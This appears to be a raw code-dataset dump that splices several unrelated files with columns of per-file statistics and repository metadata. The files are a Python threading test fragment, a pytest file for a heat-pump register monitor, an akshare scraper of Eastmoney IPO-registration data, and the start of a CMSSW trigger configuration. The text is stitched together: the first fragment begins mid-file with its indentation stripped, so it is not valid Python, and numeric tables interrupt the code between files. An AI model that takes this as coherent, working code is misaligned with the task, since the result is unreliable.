Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise([m(1)]), timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(0, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_wait_many(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 6
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
herald.wait_for_all(HaLinkMessagePromise([m(1), m(5)]),
timeout_sec=2)
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertEqual(4, len(herald.unsorted_deliveries.keys()))
def test_if_delivered_earlier_than_awaited_notified_immediately(self):
herald = DeliveryHerald()
notified_ok = True
thread_count = 1
latch = CountDownLatch(thread_count)
def fn(msg: MessageId):
            nonlocal notified_ok
            try:
LOG.debug('Thread started')
herald.notify_delivered(msg)
LOG.debug('Notified delivery %s', msg)
latch.count_down()
LOG.debug('Main thread unblocked')
except:
logging.exception('*** ERROR ***')
notified_ok = False
threads = [
Thread(target=fn, args=(MessageId(100, i + 1), ))
for i in range(thread_count)
]
for t in threads:
t.start()
# Block until all the threads come to latch.count_down() and thus
# the message is notified for sure
latch.waitfor()
def m(x):
return MessageId(halink_ctx=100, tag=x)
try:
started = time()
herald.wait_for_all(HaLinkMessagePromise([m(1)]),
timeout_sec=2)
finished = time()
finally:
for t in threads:
t.join()
self.assertTrue(notified_ok,
'Unexpected exception appeared in notifier thread')
self.assertLess(
finished - started, 5,
'Awaiting thread was unblocked only by a timeout. It means '
'that unsorted_deliveries was analyzed too late.'
)
| 31.364151
| 78
| 0.536185
| 1,770
| 16,623
| 4.911299
| 0.141243
| 0.044864
| 0.011043
| 0.023927
| 0.806166
| 0.790521
| 0.784654
| 0.781433
| 0.776717
| 0.772691
| 0
| 0.01841
| 0.372616
| 16,623
| 529
| 79
| 31.42344
| 0.815131
| 0.102148
| 0
| 0.848259
| 0
| 0
| 0.096731
| 0
| 0
| 0
| 0
| 0
| 0.052239
| 1
| 0.097015
| false
| 0
| 0.022388
| 0.0199
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 54cf5a7fc7834bac1c8ddac93c56b66c551ca8f0
| 2,046
| py
| Python
| py_hpsu_monitor/commands/tests/test_monitor_canbus.py
| weltenwort/py-hpsu-monitor
| 1e170cc22a8ac063e80180f7481beb97c32e8c40
| ["MIT"]
| 1
| 2022-01-30T10:45:24.000Z
| 2022-01-30T10:45:24.000Z
| py_hpsu_monitor/commands/tests/test_monitor_canbus.py
| weltenwort/py-hpsu-monitor
| 1e170cc22a8ac063e80180f7481beb97c32e8c40
| ["MIT"]
| 30
| 2021-05-11T06:11:57.000Z
| 2022-03-28T20:15:08.000Z
| py_hpsu_monitor/commands/tests/test_monitor_canbus.py
| weltenwort/py-hpsu-monitor
| 1e170cc22a8ac063e80180f7481beb97c32e8c40
| ["MIT"]
| null
| null
| null
from ...config import DefaultRegisterConfiguration, RegisterConfiguration
from ...elster_protocol.register_types import NumberRegisterDefinition
from ..monitor_canbus import create_register_polling_configuration
def test_create_register_polling_configuration_with_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=RegisterConfiguration(
elster_index=0x0001, polling_enabled=False, polling_interval=90.0
),
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == False
assert polling_configuration.interval == 90.0
def test_create_register_polling_configuration_with_empty_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=RegisterConfiguration(elster_index=0x0001),
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == True
assert polling_configuration.interval == 60.0
def test_create_register_polling_configuration_without_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=None,
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == True
assert polling_configuration.interval == 60.0
| 42.625
| 77
| 0.785435
| 190
| 2,046
| 8.068421
| 0.2
| 0.24788
| 0.152642
| 0.155251
| 0.819309
| 0.819309
| 0.819309
| 0.733203
| 0.733203
| 0.733203
| 0
| 0.038661
| 0.152981
| 2,046
| 47
| 78
| 43.531915
| 0.845932
| 0
| 0
| 0.605263
| 0
| 0
| 0.019062
| 0
| 0
| 0
| 0.032258
| 0
| 0.236842
| 1
| 0.078947
| false
| 0
| 0.078947
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 4ada198e1d536aad128a59d4a64649a12d7e7353
| 8,419
| py
| Python
| akshare/stock_fundamental/stock_register.py
| NovelResearchInvestment/akshare
| ccce37101b26e89a46b9b8b7b27b4eebf49edccd
| ["MIT"]
| 721
| 2021-09-21T12:10:33.000Z
| 2022-03-31T09:47:01.000Z
| akshare/stock_fundamental/stock_register.py
| NovelResearchInvestment/akshare
| ccce37101b26e89a46b9b8b7b27b4eebf49edccd
| ["MIT"]
| 135
| 2021-09-21T12:07:54.000Z
| 2022-03-31T14:15:36.000Z
| akshare/stock_fundamental/stock_register.py
| NovelResearchInvestment/akshare
| ccce37101b26e89a46b9b8b7b27b4eebf49edccd
| ["MIT"]
| 234
| 2021-09-21T12:16:27.000Z
| 2022-03-31T09:47:04.000Z
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2022/1/7 17:19
Desc: Eastmoney (东方财富网) Data Center - New Share Data - Registration-based IPO Review
http://data.eastmoney.com/kcb/?type=nsb
"""
import pandas as pd
import requests
def stock_register_kcb() -> pd.DataFrame:
"""
    Eastmoney (东方财富网) Data Center - New Share Data - Registration-based IPO Review - STAR Market (科创板)
    http://data.eastmoney.com/kcb/?type=nsb
    :return: STAR Market registration-based IPO review results
:rtype: pandas.DataFrame
"""
url = "https://datacenter.eastmoney.com/securities/api/data/get"
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': '1',
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="科创板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': page,
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="科创板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']["data"])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = range(1, len(big_df) + 1)
big_df.columns = [
"序号",
"_",
"_",
"发行人全称",
"审核状态",
"_",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
"_",
]
big_df = big_df[
[
"序号",
"发行人全称",
"审核状态",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
]
]
big_df['更新日期'] = pd.to_datetime(big_df['更新日期']).dt.date
big_df['受理日期'] = pd.to_datetime(big_df['受理日期']).dt.date
return big_df
def stock_register_cyb() -> pd.DataFrame:
"""
    Eastmoney (东方财富网) Data Center - New Share Data - Registration-based IPO Review - ChiNext (创业板)
    http://data.eastmoney.com/xg/cyb/
    :return: ChiNext registration-based IPO review results
:rtype: pandas.DataFrame
"""
url = "https://datacenter.eastmoney.com/securities/api/data/get"
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': '1',
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="创业板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': page,
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="创业板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']["data"])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = big_df.index + 1
big_df.columns = [
"序号",
"_",
"_",
"发行人全称",
"审核状态",
"_",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
"_",
]
big_df = big_df[
[
"序号",
"发行人全称",
"审核状态",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
]
]
big_df['更新日期'] = pd.to_datetime(big_df['更新日期']).dt.date
big_df['受理日期'] = pd.to_datetime(big_df['受理日期']).dt.date
return big_df
def stock_register_db() -> pd.DataFrame:
"""
    Eastmoney (东方财富网) Data Center - New Share Data - Registration-based IPO Review - Qualified Enterprises (达标企业)
    http://data.eastmoney.com/xg/cyb/
    :return: qualified enterprises (companies meeting the listing criteria)
:rtype: pandas.DataFrame
"""
# TODO
url = "https://datacenter-web.eastmoney.com/api/data/v1/get"
params = {
'sortColumns': 'NOTICE_DATE,SECURITY_CODE',
'sortTypes': '-1,-1',
'pageSize': '50',
'pageNumber': '1',
'reportName': 'RPT_KCB_IPO',
'columns': 'KCB_LB',
'source': 'WEB',
'client': 'WEB',
'filter': '(ORG_TYPE_CODE="03")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params.update({'pageNumber': page})
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']['data'])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = range(1, len(big_df) + 1)
big_df.columns = [
"序号",
"_",
"_",
"_",
"企业名称",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"经营范围",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"近三年营业收入-2019",
"近三年净利润-2019",
"近三年研发费用-2019",
"近三年营业收入-2018",
"近三年净利润-2018",
"近三年研发费用-2018",
"近三年营业收入-2017",
"近三年净利润-2017",
"近三年研发费用-2017",
"近两年累计净利润",
"_",
"_",
"_",
"_",
"_",
]
big_df = big_df[
[
"序号",
"企业名称",
"经营范围",
"近三年营业收入-2019",
"近三年净利润-2019",
"近三年研发费用-2019",
"近三年营业收入-2018",
"近三年净利润-2018",
"近三年研发费用-2018",
"近三年营业收入-2017",
"近三年净利润-2017",
"近三年研发费用-2017",
"近两年累计净利润",
]
]
return big_df
if __name__ == "__main__":
stock_register_kcb_df = stock_register_kcb()
print(stock_register_kcb_df)
stock_register_cyb_df = stock_register_cyb()
print(stock_register_cyb_df)
stock_register_db_df = stock_register_db()
print(stock_register_db_df)
| 28.733788
| 200
| 0.525003
| 952
| 8,419
| 4.396008
| 0.17437
| 0.0454
| 0.022939
| 0.032975
| 0.887455
| 0.885066
| 0.837754
| 0.808602
| 0.808602
| 0.808602
| 0
| 0.067416
| 0.312864
| 8,419
| 292
| 201
| 28.832192
| 0.656007
| 0.053569
| 0
| 0.815686
| 0
| 0.039216
| 0.364225
| 0.120477
| 0
| 0
| 0
| 0.003425
| 0
| 1
| 0.011765
| false
| 0
| 0.007843
| 0
| 0.031373
| 0.011765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| ab1ee516590025b672ef3acae956f2702f1b4a02
| 320,434
| py
| Python
| Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
| ZhengGang85129/cmssw
| b5958a19590750f49976901ec024730bd2d31c80
| ["Apache-2.0"]
| null
| null
| null
| Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
| ZhengGang85129/cmssw
| b5958a19590750f49976901ec024730bd2d31c80
| ["Apache-2.0"]
| null
| null
| null
| Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
| ZhengGang85129/cmssw
| b5958a19590750f49976901ec024730bd2d31c80
| ["Apache-2.0"]
| null
| null
| null
# This file is automatically generated by hltGetConfiguration.
# /dev/CMSSW_12_1_0/GRun/V14 (CMSSW_12_1_0)
import FWCore.ParameterSet.Config as cms
HLTConfigVersion = cms.PSet(
tableName = cms.string('/dev/CMSSW_12_1_0/GRun/V14')
)
transferSystem = cms.PSet(
destinations = cms.vstring( 'Tier0',
'DQM',
'ECAL',
'EventDisplay',
'Lustre',
'None' ),
transferModes = cms.vstring( 'default',
'test',
'emulator' ),
streamA = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQM = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQMCalibration = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamEcalCalibration = cms.PSet(
default = cms.vstring( 'ECAL' ),
test = cms.vstring( 'ECAL' ),
emulator = cms.vstring( 'None' )
),
streamEventDisplay = cms.PSet(
default = cms.vstring( 'EventDisplay',
'Tier0' ),
test = cms.vstring( 'EventDisplay',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamExpressCosmics = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamNanoDST = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamRPCMON = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamTrackerCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
default = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' ),
streamLookArea = cms.PSet( )
),
streamLookArea = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
)
)
HLTPSetInitialCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter4PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter4ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter4PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.untracked.int32( 4 ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepInOutTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0GroupedCkfTrajectoryBuilderIT = cms.PSet(
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
doSeedingRegionRebuilding = cms.bool( False ),
useHitsSplitting = cms.bool( False ),
maxCand = cms.int32( 2 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
cleanTrajectoryAfterInOut = cms.bool( False ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutTiny = cms.PSet( value = cms.double( 800.0 ) )
HLTPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter4PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTrajectoryBuilderForElectrons = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 90.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "hltESPBwdElectronPropagator" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTrajectoryFilterForElectrons" ) ),
propagatorAlong = cms.string( "hltESPFwdElectronPropagator" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPvClusterComparerForIT = cms.PSet(
track_chi2_max = cms.double( 20.0 ),
track_pt_max = cms.double( 20.0 ),
track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 1.0 )
)
HLTPSetMixedStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialCkfTrajectoryBuilderForHI = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
